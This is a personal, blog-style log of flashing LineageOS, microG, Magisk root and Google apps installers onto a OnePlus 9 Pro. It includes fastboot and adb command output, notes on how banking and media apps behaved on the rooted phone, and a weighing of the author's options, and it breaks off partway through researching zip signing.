[GrapheneOS only officially supports Pixel phones](https://grapheneos.org/faq#supported-devices)
#### CalyxOS (nope)
> [CalyxOX](https://calyxos.org/) - "Your Phone Should Be Private Everyone needs a phone. Not everyone wants to be spied on. Reclaim your privacy with CalyxOS."
Supports Pixel devices and one Xiaomi phone (never heard of it).
Seems to be pushing Signal and Tor so is super-privacy focussed.
## Google Apps and Services
There are two major parts to this:
1. Google play - the app store for downloading apk files to install (plus ratings, reviews, screenshots etc)
2. Google services - these provide services that many apps want to use to avoid multiple implementations such as location information, push notification etc.
There's a few ways of getting the google play store and related proprietary horrors:
* Open GApps - pulls down the proprietary apps and writes them to the image
* MindTheGapps? - pulls down the proprietary apps and writes them to the image
* microG - open source re-implementation of the services
[For Lineage 18.1 (Android 11) the Lineage wiki links to MindTheGaps](https://wiki.lineageos.org/gapps#mobile), and [XDA Developers says "Always Use the GApps Package Recommended by your ROM Developer"](https://www.xda-developers.com/gapps-package-recommended-rom-developer/)
I don't mind proprietary software as long as there's choice out there, and the apple app store + google play duopoly on apps is not choice. F-Droid is fine but doesn't have a single big name vendor's apps, so it's probably enough for google to dodge an anti-competitive lawsuit but not enough to produce any real competition.
Comparisons:
* <https://www.reddit.com/r/LineageOS/comments/8358p0/mindthegapps_vs_opengapps/>
* <https://www.reddit.com/r/degoogle/comments/olsv4c/i_am_very_confused_by_opengapps_mindthegapps/>
### Open GApps (installer)
Installer for google's proprietary services.
* GApps <https://wiki.lineageos.org/gapps>
* <https://github.com/opengapps/opengapps>
* <https://opengapps.org/>
Q: Why is this such a pain? A: Licensing...
> "Due to licensing restrictions, these apps do not come pre-installed with ROMs others than those from vendors that are part of the [Open Handset Alliance](http://www.openhandsetalliance.com/index.html) and must be installed as a sideload package by the user themselves." ~ <https://github.com/opengapps/opengapps/wiki/FAQ>
We're lucky they let us do this at all, google could take their toys away from us at any time.
For Open GApps pico looks sufficient <https://github.com/opengapps/opengapps/wiki/Package-Comparison>, Lineage recommends nano and no bigger.
### MindTheGapps (installer)
Installer for google's proprietary services.
Really haven't found much information about this.
#### About
* <https://gitlab.com/MindTheGapps/vendor_gapps> - I think this is probably the official source
* There's no download link, as mentioned in this issue: <https://gitlab.com/MindTheGapps/vendor_gapps/-/issues/1>
* <https://github.com/MindTheGapps/vendor_gapps> appears to be a stale copy, maybe they moved hosting to gitlab
* <https://www.getdroidtips.com/mindthegapps-8-1-0/>
* <https://forum.xda-developers.com/t/change-opengapps-for-mindthegapps-afterthought.3837816/>
#### Installation
* This wasn't a lot of help but basically said just flash it: <https://www.getdroidtips.com/mindthegapps-8-1-0/>
### microG (open source reimplementation)
<https://github.com/microg>
A free software implementation of shared services provided by the proprietary google services (such as location and push messaging used by many apps).
Doesn't work properly when flashed to lineage according to the faq so they made their own fork of Lineage "Lineage for microG" (see above)
### Aurora - play store proxy
Download apks (installation files) from the google play store without any googleness.
* <https://aurora-store.en.uptodown.com/android>
* <https://f-droid.org/packages/com.aurora.store/>
### Yalp - play store proxy
<https://yalp-store.en.uptodown.com/android>
### F-Droid app store
[F-Droid](https://f-droid.org/) is an app store for android like google play but without all the googlyness.
This a bit pointless if you install play because all the open source apps are available in both, and the closed ones are only in play. I think I'll skip this for now but I'm glad it exists... Though it is pre-installed in lineage-for-microG so I have poked around and installed a few things.
### Playmaker - play store / f-droid integration
<https://github.com/NoMore201/playmaker>
## Recovery images
### TWRP (great but not needed)
Previously I've used TWRP, and I got as far as flashing it before discovering [Lineage has it's own recovery image](https://www.xda-developers.com/lineageos-18-1-review/)
* Unlock bootloader <https://www.getdroidtips.com/oneplus-9-pro-unlock-bootloader/>
* Download TWRP for lemonadep <https://twrp.me/oneplus/oneplus9pro.html> - [3.6 twrp download for lemonadep](https://eu.dl.twrp.me/lemonadep/twrp-3.6.0_11-0-lemonadep.img.html)
* Get twrp public gpg/pgp public key to be able to verify `.asc` files <https://twrp.me/faq/pgpkeys.html>
* Flash TWRP (TeamWin Recovery Project?) <https://twrp.me/>
* Power off the phone
* Hold down volume-down and power buttons
* Select english
* select reboot to fastboot
* connect the usb cable (usb-c to usb-c doesn't work on my dell xps, use the bigger usb 3 A to usb-c cable)
* run `fastboot devices` on the laptop (connected over usb), you should see your phone listed
* boot the phone from the local twrp image `fastboot boot twrp-3.6.0_11-0-lemonadep.img`, phone boots up into twrp gui
* advanced > flash current twrp
* there's a note about bootloops, but the options isn't there so skipping that
* reboot > power off (says current slot: A, just for the record)
* power on with volume-down held again, boots straight to twrp this time
### LineageOS's recovery image
Came across this here: <https://www.xda-developers.com/lineageos-18-1-review/>
Works well, flashed no problem and have used both recovery and fastboot modes with no issues. You'll see it as part of the steps below.
## Installing LineageOS on OnePlus 9 Pro (take 1)
It begins. [LineageOS](https://lineageos.org/).
The oneplus 9 pro device is codename `lemonadep`.
Useful howtos:
* [LineageOS official installation wiki page for OnePlus 9 pro lemonadep](https://wiki.lineageos.org/devices/lemonadep/install)
* [How-To Geek: How to Install LineageOS on Android](https://www.howtogeek.com/348545/how-to-install-lineageos-on-android/)
* [Android Authority: Beginner’s guide to installing LineageOS on your Android device](https://www.androidauthority.com/lineageos-install-guide-893303/) - lots more context and screenshots
* [LineageOSROMS (unofficial)](https://lineageosroms.com/install-lineageos/) - a very short 8 step guide
* [LineageOSROMS (unofficial) full guide](https://lineageosroms.com/lemonadep/)
* [GetDroidTips](https://www.getdroidtips.com/lineage-os-18-1-oneplus-9-9-pro/) - not sure there's much extra useful here
[XDADevelopers coverage of Lineage support for OnePlus 9 pro](https://www.xda-developers.com/lineageos-18-builds-oneplus-9-pro-razer-phone-2-lenovo-p2/)
The steps:
* Download latest nightly (there's no stable/unstable on this): <https://download.lineageos.org/lemonadep> - this has both the ROM (OS image) and the recovery image.
* Download copy-partitions <https://androidfilehost.com/?fid=2188818919693768129> (as per wiki)
* The sha256 for the copy I have is `200877dfd0869a0e628955b807705765a91e34dff3bfeca9f828e916346aa85f copy-partitions-20210323_1922.zip`
* Verify all the sha256 sums: `sha256sum -c *.sha256`
* Boot to fastboot
* flash the lineage recovery:
```
tim@max:~/Downloads/oneplus9pro/LineageOS
$ fastboot flash boot lineage-18.1-20211214-recovery-lemonadep.img
Sending 'boot_a' (196608 KB) OKAY [ 6.113s]
Writing 'boot_a' OKAY [ 0.655s]
Finished. Total time: 6.985s
```
* copy partitions as instructed
* boot into recovery (vol-down + power)
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload copy-partitions-20210323_1922.zip`
* Ignore unknown sig and "continue"
* wipe
* boot into recovery (vol-down + power) if not already in it
* "format data / factory reset"
* OS install
* boot into recovery (vol-down + power) if not already in it
* "apply update" > "apply from adb" (aka sideload)
```
tim@max:~/Downloads/oneplus9pro/LineageOS
$ adb sideload lineage-18.1-20211214-nightly-lemonadep-signed.zip
serving: 'lineage-18.1-20211214-nightly-lemonadep-signed.zip' (~47%)
adb: failed to read command: Success
```
apparently this is normal, but the failed to flash error on the phone is not, and rebooting drops me back into the existing Oxygen install. Dammit.... Try again
* Second attempt ran fine
* output: `step 1/2`
* output: `step 2/2`
* then recovery logo comes back up and it just sits there
* volume up to the back arrow at the top, power to press it
* *then* it says "`install complete with status 0`" (zero being unix-speak for no-issues)
* but it doesn't ever get past the lineage logo when booting, maybe because of the boot of oxygen. hmm
* [hard-power-off](https://www.youtube.com/watch?v=y2yB2dRrXiA) by holding down volume-up and power button
* take 3,
* back to recovery
* re-wipe (factory reset)
* reboot
* this time it booted... briefly
* it got to setup screen, then before I did anything rebooted into some kind of recovery failsafe and prompted to factory reset again, which I did. This time it rebooted and stayed up while I zipped through the wizard.
* go take a look - ignore the warning about doing gapps etc first just so we can see what vanilla Lineage looks like. We can always wipe & reflash
* wonderfully empty app list!
* basic main camera & selfie cam works
* flashlight works
* odd android verify notification, didn't seem to work
* top shelf only available on lockscreen, odd
* no sim yet and wifi not connected yet, so not much else to test
* vol-down + power still takes screenshots
### Connect adb, see if we get root shell
<https://developer.android.com/studio/command-line/adb#Enabling>
* On the phone enable adb
* settings > about phone > tap "build number" repeatedly
* settings > system > advanced (grrrr) > developer options
* usb debugging [on]
* rooted debugging [on]
* disable adb authorization timeout [on]
* connect usb cable to laptop
* phone prompts "Allow USB Debugging?"
* tick "always allow"
* press "allow"
* On the laptop `adb devices` should now show the phone
Success with non-root:
```
$ adb shell
OnePlus9Pro:/ $ ^D
```
Root denied without flipping the "rooted" option:
```
$ adb root
ADB Root access is disabled by system setting - enable in Settings -> System -> Developer options
```
After enabling rooted debugging as above:
```
$ adb root
restarting adbd as root
$ adb shell
OnePlus9Pro:/ # whoami
root
```
### Getting root back
#### Grumble
It really annoys me that on a laptop this isn't even a step, yet on Android this is a whole additional drama. But I may have already mentioned that. Understanding the reasons doesn't mean I have to like it.
#### adb root shell
According to <https://www.xda-developers.com/lineageos-dropping-superuser-addonsu-implementation-favor-magisk-manager/> adb root shell is the official LineageOS way of getting root access to "mess with important files".
```
$ adb root
restarting adbd as root
$ adb shell
OnePlus9Pro:/ # whoami
root
```
Worth knowing but not much help for running titanium backup as root.
#### Magisk
According to <https://www.xda-developers.com/lineageos-dropping-superuser-addonsu-implementation-favor-magisk-manager/> Magisk is the only real option now. I guess SuperSU still works but lacks the masking that allows you to fool android pay etc.
##### ⚠️ Beware of fake Magisk sites !! ⚠️
Github is the official home for Magisk and it's downloads: <https://github.com/topjohnwu/Magisk>
[**Beware of clone sites**](https://www.xda-developers.com/psa-magiskmanager-com-not-official-website-magisk/amp/) especially ones offering downloads. `MagiskManager.com` is not legit or authorised and may host malware at some point. I've seen a few others too. They look like SEO optimised clones that could potentially be feeding some or all visitors malware.
It's worth being extra-careful with things like recovery images and rooters because by definition they have full control of your device, malicious or malign.
##### Magisk root install
LineageOS said not to boot before doing installing GApps, I'm not sure if that applies to Magisk too. I already have booted up. Not sure if a factory reset plus wipe will be enough or whether the image will have to be reflashed. I'll try with just an install, if that doesn't work I'll try the reset and see what happens, and if *that* doesn't work I'll try a full reinstall.
* Look at readme at <https://github.com/topjohnwu/Magisk>
* Follow instructions <https://topjohnwu.github.io/Magisk/install.html>
* Download latest release <https://github.com/topjohnwu/Magisk/releases/latest>
* install the app with adb (with the phone on, and booted to LineageOS as per normal use)
* <https://www.droidviews.com/install-apk-files-using-adb-commands/>
```
$ adb install Magisk-v23.0.apk
Performing Streamed Install
Success
```
* On the phone, swipe up for the full app list (drawer), and there is a Magisk icon!
###### Getting boot.img
The instructions for Magisk just say you need `boot.img`, leaving know clues how to get it. [I've proposed explaining how to extract them in this pull request](https://github.com/topjohnwu/Magisk/pull/5132)
It turns out it's embedded in the Lineage system image `lineage-18.1-20211214-nightly-lemonadep-signed.zip` that we've already downloaded.
There's another payload extractor with easier dependencies that's worth a try, especially if you don't already have python: [payload-dumper-go](https://github.com/ssut/payload-dumper-go)
| [payload-dumper-go downloads](https://github.com/ssut/payload-dumper-go/releases/latest). I've now tested this and it works great. You don't even have to unzip the zip.
Extract the `payload.bin` file from the `lineage-18.1-20211214-nightly-lemonadep-signed.zip` to the same folder as the python script.
Some instructions on using python to extract the boot image: <https://forum.xda-developers.com/t/guide-how-to-extract-payload-bin-from-ota.3830962/> (ignore the file it's older than the github one)
The `payload_dumper` file appears to be from <https://github.com/vm03/payload_dumper> assuming my googling is accurate.
I didn't need to do the pip install.
I did change the python to python3 at the top of the py file and make it executable.
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ ./payload_dumper.py payload.bin
boot
dtbo
odm
product
system
system_ext
vbmeta
vbmeta_system
vendor
vendor_boot
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ ll output
total 5.6G
-rw-rw-r-- 1 tim tim 192M Dec 20 23:20 boot.img
-rw-rw-r-- 1 tim tim 24M Dec 20 23:20 dtbo.img
-rw-rw-r-- 1 tim tim 2.8M Dec 20 23:20 odm.img
-rw-rw-r-- 1 tim tim 1.3G Dec 20 23:21 product.img
-rw-rw-r-- 1 tim tim 267M Dec 20 23:21 system_ext.img
-rw-rw-r-- 1 tim tim 2.5G Dec 20 23:21 system.img
-rw-rw-r-- 1 tim tim 8.0K Dec 20 23:21 vbmeta.img
-rw-rw-r-- 1 tim tim 4.0K Dec 20 23:21 vbmeta_system.img
-rw-rw-r-- 1 tim tim 192M Dec 20 23:22 vendor_boot.img
-rw-rw-r-- 1 tim tim 1.3G Dec 20 23:22 vendor.img
```
Hurrah, now we have a `boot.img` to give to Magisk.
###### Magisk rooting
Copy the `boot.img` across:
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ adb push output/boot.img /sdcard/
output/boot.img: 1 file pushed, 0 skipped. 177.5 MB/s (201326592 bytes in 1.082s)
```
* Press install on the Magisk app.
* "Select and Patch a File"
* hamburger in file browser > "OnePlus 9 Pro" (obviously, duh) > `boot.img`
* "let's go ->"
* Magisk shows steps then" output file is written to..." and a path to download folder
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ adb shell
OnePlus9Pro:/ # ls -lh /sdcard/Download/
total 96M
-rwx------ 1 u0_a163 u0_a163 192M 2021-12-14 13:21 magisk_patched-23000_BYMDt.img
```
* pull the file back to the laptop `adb pull /sdcard/Download/magisk_patched-23000_BYMDt.img`
* Now flash the file to the phone:
* (the vol-up + power didn't work for me, just did a normal boot, vol-down + power is reccovery not fastboot)
* Settings > system > advanced (ffs) > gestures (wtf?) > power menu > advanced restart [on]
* power button (hold) > power > restart > fastboot
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ fastboot flash boot magisk_patched-23000_BYMDt.img
Sending 'boot_b' (196608 KB) OKAY [ 6.035s]
Writing 'boot_b' OKAY [ 0.639s]
Finished. Total time: 6.853s
```
* power off
* power on
* open up the Magisk app - it shows installed version number now, hurrah
Using Magisk:
* Click the cog (top right) to optionally turn on "MagiskHide"
* Along the bottom are four icons
* Home
* Shield - shows root requests
* bug - shows logs
* jigsaw piece - shows modules, activate, deactivate & install
### adb
[adb](https://developer.android.com/studio/command-line/adb)
I consider this an important backup access to the phone. If the screen fails then this allows you to pull any important files off over usb.
Steps for this are above.
## Installing "Lineage for microG" (tried, rejected for now)
* <https://lineage.microg.org/> has install and download links
* Download image from <https://download.lineage.microg.org/lemonadep/>
* check sha: `sha256sum -c lineage-18.1-20211220-microG-lemonadep.zip.sha256sum`
* run update_verifier python script:
* download (or clone) [python update_verifier](https://github.com/lineageos4microg/update_verifier) - <https://github.com/lineageos4microg/update_verifier/archive/refs/heads/master.zip>
* setup python3 with [asdf-vm](https://asdf-vm.com/) (I had python 3 but no pip, and I like to use adsf)
* extract the zip, open terminal in extracted folder
* `asdf plugin add python`
* `asdf install python 3.10.1`
* `asdf local python 3.10.1`
* `pip install -r requirements.txt`
* `python update_verifier.py lineageos4microg_pubkey ../lineage-18.1-20211220-microG-lemonadep.zip`
* output: `verified successfully`
* Go back to lineage install instructions <https://wiki.lineageos.org/devices/lemonadep/install>
* Boot to fastboot
* flash the lineage-microG recovery: `fastboot flash boot lineage-18.1-20211220-microG-lemonadep-recovery.img`
* copy partitions as instructed
* boot into recovery (vol-down + power)
* or "enter recovery" from lineage fastboot
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload ../LineageOS/copy-partitions-20210323_1922.zip`
* Ignore unknown sig and "continue"
* wipe
* boot into recovery (vol-down + power) if not already in it
* "format data / factory reset"
* OS install
* boot into recovery (vol-down + power) if not already in it
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload lineage-18.1-20211220-microG-lemonadep.zip`
* reboot
* skip all the guided setup steps
* open the microG app
* run the self check (all green ticks for me, woo)
So now I have a clean LineageOS install with a FOSS re-implementation of google's proprietary shared services. Win.
Now re-run magisk sideload from above to get root again.
* re-enable adb as before
* re-enable advance power button menu
* `adb install Magisk-v23.0.apk`
* grab a [payload-dumper-go binary release](https://github.com/ssut/payload-dumper-go/releases/latest)
* `payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go lineage-18.1-20211220-microG-lemonadep.zip`
* `adb push extracted_20211221_231517/boot.img /sdcard/Download/`
* run the patch in the phone Magisk UI (under "install")
* get the filename to pull: `adb shell ls /sdcard/Download`
* `adb pull /sdcard/Download/magisk_patched-23000_d5mu3.img`
* reboot to fastboot
* `fastboot flash boot magisk_patched-23000_d5mu3.img`
* "reboot system now" in lineage fastboot menu
Success, now I have root *and* microG.
Next, see if Aurora does the job, and if not how do I get google play on top of microG, if that's even possible. Till next time...
### Getting apps
#### F-Droid
F-Droid is preinstalled (stared blankly at app list for a while before spotting it!) so that was easy, this can install *many* open source apps, and warns about "anti-features" which is a nice touch.
Used F-Droid to install andOTP as a test (alternative to google authenticator 2FA app). Worked well.
#### Apps from play store - Aurora
Found Aurora in f-droid with a search, installed no problems, opened it up.
First thing it does is prompt for install type which is confusing and lacks enough context to know what it means. The four types are explained further here: <https://auroraoss.com/faq/#how-does-aurora-store-install-apps> thought I'm still not really sure. I don't know what a "split apk" is yet, and I don't see if there's a difference between root and services as I could do either and they both say they do the same thing.
* Session - recommended but not clear why, I think it's saying it's like "Aurora Services" but with more something-or-other
* Native - doesn't support split apks, that sounds bad, see below for what they are (see below for split apk research)
* Root - auto install when downloaded
* Aurora Services - auto install when downloaded
How to choose? I guess I'll go with the recommendation.
Couple of theme questions. Meh.
Installer question: "Select a suitable installer"
* External Storage Access [grant] - pops and allow dialog, clicked "allow"
* External Storage Manager [grant] - required on R+ (aka android 11), which we are running, guess I'll need that, - opened permissions screen, toggled to allow
* Installer Permission [grant] - opened permissions screen, toggled to allow
"Finish"
Log in using:
* Google
* Anonymous
It seems from what I've read in the FAQ and terms that using the real login is best because the anon accounts end up with random locales and app restrictions depending on where the login was generated.
[install keepassdroid and push my kdb across with adb to get the google login, eventually the kdb will be sync'd with syncthing]
... log in with google ...
And we're in, app listing showing. Disconcerting to see disney+ etc in "free" app store on a "free" phone.
WhatsApp isn't available in f-droid so let's try that as an experiment... It's in the list... it installed... it opened... it worked! (And logged me out of the other phone, fucking whatsapp).
##### What's a split APK?
* APK splitting - <https://developer.android.com/studio/build/configure-apk-splits>
* Android App Bundles - defers apk generatoin to play store <https://developer.android.com/guide/app-bundle>
* Feature delivery - partial app additions and updates <https://developer.android.com/guide/playcore/feature-delivery>
* Old unsupported app "SAI" split apk installer:
* <https://forum.xda-developers.com/t/guide-split-apk-installation.3934631/>
* <https://github.com/Aefyr/SAI>
* <https://www.reddit.com/r/androiddev/comments/cenuvs/what_is_it_with_publishing_split_apks_on_google/>
* <https://www.reddit.com/r/androiddev/comments/ci4a7r/confused_about_split_apk/>
### The state of the system
What's working and what isn't.
#### Google voice to text (dead)
The keyboard has a little mic button which allows you to use google's services to enter text anywhere you like by typing. This is useful as I hate phone keyboards. I use it quite a lot. Unsurprisingly with the microG setup that's not working at all. The button is there but it does nothing.
#### Bluetooth (working)
Headphones connected and played no problem.
### The state of the apps
What's working and what isn't.
#### Banking apps (mixed)
Let's start with the big one. This is most likely to sink an open source effort as they try to protect themselves by joining in the lockdown.
Surprisingly two out of three of the banking apps I'd like to use actually worked on the rooted custom ROM with an unlocked bootloader. I had not turned on the magisk hide capability at this point. One banking app behaved as if nothing was different, one popped a warning but allowed the app to continue and one flat out refused to run. I'm not going to name the banks involved on the public internet as I don't want to encourage anyone to test the security of my banking.
One of the apps logged me out of my other phone. The other functioning app offered to transfer a "digital key" to the new device, and without that allowed me to use the first phone to generate a login code and use that to poke around. I didn't try transferring the key.
More worrying was the realisation that I'd been locked in to running a google/iOS locked-down device by one of the banks as they are an "app-first" bank. You can't even use the online banking without the phone app, and the phone app requires a locked and signed phone. It's only by going on this very journey of actually trying to set up a phone that I control that I'd even noticed this insidious creeping embrace of platform-lockin. So now to truly escape the platform, I have to change banks as well.
#### Google calendar (mostly working)
I'm afraid I still use google's calendar, and there's a high cost of change as I've got my other half using a shared calendar. The calendar worked fine, although oddly the "widget" (view of calendar that can be placed on the phone's desktop when unlocked) was blank until I left the phone in the drawer with wifi off for two days. For who-knows-what reason when I got it out the drawer it has started working.
Oddly the events have shown up but reminders are missing. This is a bit of a problem as I use them a lot. It's not that they're local to my other phone because they show on the google calendar web interface too.
#### Amazon things (working)
The amazon shopping app worked no problem.
To my surprise the amazon primve video app worked and played content as normal. I rather expected some kind of DRM smackdown to kick in on a rooted device.
Audible worked and played no problem.
#### Spotify (working)
Again pleasingly working with no quibbling or warnings. This is more important to me at the moment than perhaps it should be.
Casting sound to chromecast audio not working.
#### Whatscrapp (working)
Much as I hate WhatsApp and it being owned by Facebook/Meta .... thanks to network effect I kinda still need it. I've managed to get some of my contacts over to telegram/signal but not everyone.
WhatsApp worked but signed me out of the other phone (ffs). Bonus points for receiving an important message from someone I haven't heard from in about a year on the wrong phone. Ugh.
So on the plus side I've learned of another reason to dislike WhatsApp.
### Hiding the unlock & root
Magisk has in its settings a "hide" option. This had no noticeable effect on the "SafteyNet" test (still three of three tests fail for me) built in to Magisk. I didn't notice any change in app behaiour in my limited poking.
### WiFi-based location (turn on)
Understandably from a freedom-warrior point of view the wifi-based loction services are off by default, but this is a bit of a pain because if you've ever used pure GPS positioning you'll know it's shit at doing it in houses, offices and built up areas, takes ages to get a lock, and is a bit hit and miss in cars. The accuracy you normally see is much more a function of the ubiquity of wifi in our urban lives.
### Screen refresh rate 60/120Hz (increase)
The "minimum screen refresh rate" setting was set to 60Hz. There's also a developer option for showing the current rate. In my experiment it sat at 60Hz all the time. This is fine till you scroll up and down, then you notice how much smoother the text scrolls at 120Hz. I upped the minimum to 120Hz which seemd to work.
There's also a smooth-scroll option that I turned on that seems to produce a nicer effect.
## Using adb to do backups
It might be possible to backup a locked down phone without root by using adb's backup capabilities. I haven't looked into this much or tried it yet but here's some quick research notes:
* [gist: Backup android app, data included, no root needed, with adb](https://gist.github.com/AnatomicJC/e773dd55ae60ab0b2d6dd2351eb977c1)
* <https://net2.com/how-to-backup-and-restore-your-android-device-with-adb-on-ubuntu/>
* <https://www.paulligocki.com/backup-restore-android-with-adb/>
* <https://stackpointer.io/mobile/android-adb-backup-extract-restore-repack/372/>
* <https://stackoverflow.com/questions/19225467/backing-up-android-device-using-adb>
* <https://android.stackexchange.com/questions/69567/what-all-does-adb-backup-and-how-do-i-restore-part-of-it>
This might give me a way of rescuing some of my data from my old phone that de-rooted itself in an OS upgrade and fucked my titanium backups (still bitter).
Oh but wait...
> [Devs can set the ALLOW_BACKUP flag to "No"](https://android.stackexchange.com/questions/69567/what-all-does-adb-backup-and-how-do-i-restore-part-of-it#comment125038_69576)
Argh, what is wrong with this platform.
## Customisations
* Turn on all the power button options:
* Settings > system > advanced (ffs) > gestures (wtf?) > power menu > advanced restart [on]
## Options - what now?
That's been an enlightening exercise in "is this even possible". I've learned a huge amount about the current state of the phone ecosystem. I'm in equal measure dismayed and hopeful, there are some unpleasant trends and circumstances, and some really encouraging signs of hope for the open ecosystem.
There really isn't a clear answer for me for where to go from here. There are downsides and challenges in every direction.
The options available seem to be in increasing order of freedom and somewhat decreasing order of utility:
* Get an iPhone and abandon my principles and control, go live in a digital nursing home. - YeahNo.
* get banking apps galore
* never get root again
* trust apple to administer the correct dosage of backups
* forever more fight the divide between iOS and my linux laptops
* Install Oxygen 11, relock the bootloader, live without root, have no upgrade path because Oxygen is dead. - No.
* possibly brick the phone trying to lock it
* get banking apps
* never get root again
* never have decent backups
* forever more fight the divide between iOS and my linux laptops
* Install lineage and one of the google apps installers
* still no bank
* probably get reliable google goodness
* get stalked by google (no change there, I dno't mind as much as some about this)
* unknown time-to-failure
* I think this is probably the most "mainstream" of the subversive options so is most likely to continue to have a forward path for the next few years
* worry about security of unlocked evenrything and the security of lineage - I think it's probably no worse than linux at this point but who knows
* Install lineage-for-microG (current experiment)
* no bank, no voice-to-text
* worry more about the security of build servers for this niche option
* I don't know how sustainable this project is, it's certainly noble
* go all in and run a linux distro
* definitely no apps for you
* get to take the moral high ground
* lose touch with everyone who is on whatsapp
It would be nice to think that by choosing to run the most open thing I can I am in some way helping, but I think the truth is users really don't make much difference to projects like this unless they come in enough numbers to sway app vendors like WhatsCrapp to support more obscure platforms. It's only the hackers and those who can financially fund projects who really make a difference here. So while I want to run the most open thing I can it doesn't really matter a hill of beans outside of my own brain whether I do or not.
I think having written down the options I'm swinging towards lineage + proprietary google services. This seems to solve the immediate problem of getting unlocked and rooted and getting working backups again without losing everything that's useful to me in the process.
I'm glad I've tried the microG version, and hope we see open source slowly chip away at the power of the two giants just like Linux did in the desktop space over decades.
## Installing LineageOS + google services on OnePlus 9 Pro (take 2) - fail
I now have the lineage bootloader so the steps to get into recovery etc are a bit different than with stock or TWRP.
> "Note: If you want the Google Apps add-on on your device, you must follow this step before booting into LineageOS for the first time!" ~ <https://wiki.lineageos.org/devices/lemonadep/install#installing-lineageos-from-recovery>
1. Download latest nightly (there's no stable/unstable on this): <https://download.lineageos.org/lemonadep> - this has both the ROM (OS image) and the recovery image.
1. Download copy-partitions <https://androidfilehost.com/?fid=2188818919693768129> (as per wiki)
1. The sha256 for the copy I have is `200877dfd0869a0e628955b807705765a91e34dff3bfeca9f828e916346aa85f copy-partitions-20210323_1922.zip`
1. Verify all the sha256 sums: `sha256sum -c *.sha256`
1. Boot to fastboot
1. flash the lineage recovery: `fastboot flash boot lineage-18.1-20211228-recovery-lemonadep.img`
1. don't reboot yet
1. copy partitions as instructed
1. switch to recovery
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload copy-partitions-20210323_1922.zip`
1. Ignore unknown sig and "continue"
1. come back out of recovery menu (don't reboot yet)
1. don't reboot yet
1. "factory reset" > "wipe all data"
1. don't reboot yet
1. flash OS:
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload lineage-18.1-20211228-nightly-lemonadep-signed.zip`
1. don't reboot yet
1. MindTheGapps - I haven't found any instructions for this anywhere
1. check the arch (it's `arm64`) here <https://wiki.lineageos.org/devices/lemonadep/>
1. Download the arm64 build from <https://androidfilehost.com/?w=files&flid=322935>
1. or the "mirror" <http://downloads.codefi.re/jdcteam/javelinanddart/gapps>
1. Given there's no shas anywhere I downloaded from several mirrors and cross-checked the hashes. `85481cb98c8a8692f52c033ead1db436870af385498a917701fcd8c6182e145c MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. ignore signature warning (the price of escaping a closed ecosystem)
1. error shown on phone, roughly:
```
low resource device detected, removing large extras
not enough space for gapps! aborting
...
error in /sideload/package.zip (status 1)
```
1. [patch that adds error message](https://gitlab.com/MindTheGapps/vendor_gapps/-/commit/0f6b4560288267b644c49de0fdc538fa30980708)
1. [current message on `sigma` branch](https://gitlab.com/MindTheGapps/vendor_gapps/-/blob/de0847802034654d63150c3de3ca05f1af326316/build/meta/com/google/android/update-binary#L38)
1. In lineage recovery, mount `sytsem` and enable adb, run df:
```
OnePlus9Pro:/ # df -h /mnt/system
Filesystem Size Used Avail Use% Mounted on
/dev/block/dm-2 0.9G 0.9G 3.0M 100% /mnt/system
```
That is indeed quite full. Annoyingly the installer doesn't say which partition is full.
1. Some ideas here <https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/>
1. Try format & reboot to recovery, nope.
1. hint that it could be slot related <https://www.reddit.com/r/LineageOS/comments/fuykda/lineage_os_171_opengapps_error_not_sufficient/>
1. let's try a swap slot as per <https://www.reddit.com/r/LineageOS/comments/fqashj/difficulty_installing_gapps_after_lineage_os/fluhd8s/?context=3>
1. enter fastboot
```
tim@max:~/Downloads/oneplus9pro/MindTheGapps
$ fastboot set_active other
Setting current slot to 'b' OKAY [ 0.043s]
Finished. Total time: 0.044s
```
1. enter recovery
1. re-run the sideload
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. ignore signature warning (the price of escaping a closed ecosystem)
1. same space error. sigh
### Possible cause of space error
1. [Partition not mounted at all](https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/post-76072942)
1. [LineageOS image has partitions that are too small](https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/#post-84651523) to fit extra g-apps in.
* Maybe use [TWRP BigSys](https://forum.xda-developers.com/t/dev-kernel-4-4-android-8-0-oreo.3688948/) to get bigger partitions??
* Manually re-partition? Alegedly dangerous.
* <https://android.stackexchange.com/questions/216123/android-how-to-increase-system-partition-and-decrease-data-partition#comment276924_216123> warning of brickability if you touch wrong device
* <https://www.reddit.com/r/Android/comments/2o8lvf/why_cant_we_resize_partitions_on_android_but_on/>
1. [Incompatibility with Lineage bootloader - use TWRP instead](https://www.reddit.com/r/LineageOS/comments/fu70jg/linageos_171_unable_to_install_gapps/) - worth a try I think, probably the next thing I'll try.
1. Ruled Out: [Wrong/stale slot in use](https://www.reddit.com/r/LineageOS/comments/fuykda/lineage_os_171_opengapps_error_not_sufficient/) - tried swap slot (above), no change.
1. Ruled out: Booting phone before gapps install (didn't do this so not this).
### Patching the installer - abandoned
It seems to me having read around that the error message is hiding useful information on the state of the device and what exactly failed. (Which partition is out of space? Is it just read only or something?). I'n not feeling like playing with partitioning given the warnings I saw on a forum of potentially bricking a device
There's links to the source above and I did start fiddling with this, but you have to figure out how to re-sign the zip to get it to install at which point I fell down an android-sized rabbit hole.
#### Signing zips and apks
Here's what I found so far, I haven't got it working yet.
I *think* it's the same signing that you have to do to `apk` files, and `apk` is just a special shaped `zip` file. Off into learning-android-sdk-land I went...
* There's some kind of strange android app that can sign zips called [ZipSigner](https://f-droid.org/forums/topic/zipsigner/)
* [ZipSigner is missing source code](https://code.google.com/archive/p/zip-signer/issues/3) so you are relying on random binaries. Dodgy but probably well intentioned.
